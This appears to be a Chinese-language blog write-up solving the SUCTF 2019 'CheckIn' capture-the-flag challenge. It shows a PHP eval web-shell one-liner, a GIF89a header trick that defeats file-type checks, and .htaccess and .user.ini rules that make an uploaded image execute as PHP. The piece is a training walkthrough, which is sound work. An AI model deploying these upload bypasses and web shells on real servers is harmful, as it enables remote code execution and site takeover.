• [SUCTF 2019]CheckIn (.htaccess和.user.ini)


    evil.php

     eval($_POST['evil'])?>
    
    • 1

    在这里插入图片描述
    抓包修改Content-Type: image/jpeg
    仍然是后缀名不合法

    更改后缀名为php3、php4、phtml等都不行
    将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)
    在这里插入图片描述
    换一个一句话木马

    <script language="php">eval($_POST['evil'])</script>
    
    • 1

    在这里插入图片描述
    进行了文件头的校验

    GIF89a? <script language="php">eval($_POST['evil'])</script>
    
    • 1

    一般都是直接用这个就行了
    在这里插入图片描述
    成功了,但是无法解析

    尝试.htaccess和.user.ini

    .htaccess

    <FilesMatch "evil.jpg">
    SetHandler application/x-httpd-php
    </FilesMatch>
    
    需要加个文件头绕过
    GIF89a? 
    <FilesMatch "evil.jpg">
    SetHandler application/x-httpd-php
    </FilesMatch>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9

    意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php
    在这里插入图片描述
    上传成功

    访问evil.jpg即
    http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/uploads/c47b21fcf8f0bc8b3920541abd8024fd/evil.jpg

    然后尝试使用antsword连接,但是发现连不上,不太确定哪里出了问题

    尝试.user.ini

    auto_prepend_file和auto_append_file
    他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)

    .user.ini

    GIF89a?
    auto_prepend_file=evil.jpg
    
    • 1
    • 2

    在这里插入图片描述
    上传成功

    但不知道什么原因(可能是时间限制,自动删除了),我们刚才上传的evil.jpg不在了,重新上传一下即可

    然后访问http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php
    用antsword连接即可

  • 相关阅读:
    【Spring框架学习3】Spring Bean的作用域 及 生命周期
    Linux安装MySQL
    【Verilog 教程】7.1Verilog 除法器设计
    QT读写USB接口数据
    管程的定义以及基本特征
    顺序结构程序设计(python)
    【问题记录】audio标签变更currentTime属性值无效,currentTime变为0
    pycharm 设置多级跳转SSH
    Cell子刊综述:药物研发进入智能生成时代
    Windows安装MongoDB及配置
  • 原文地址:https://blog.csdn.net/qq_55675216/article/details/126256401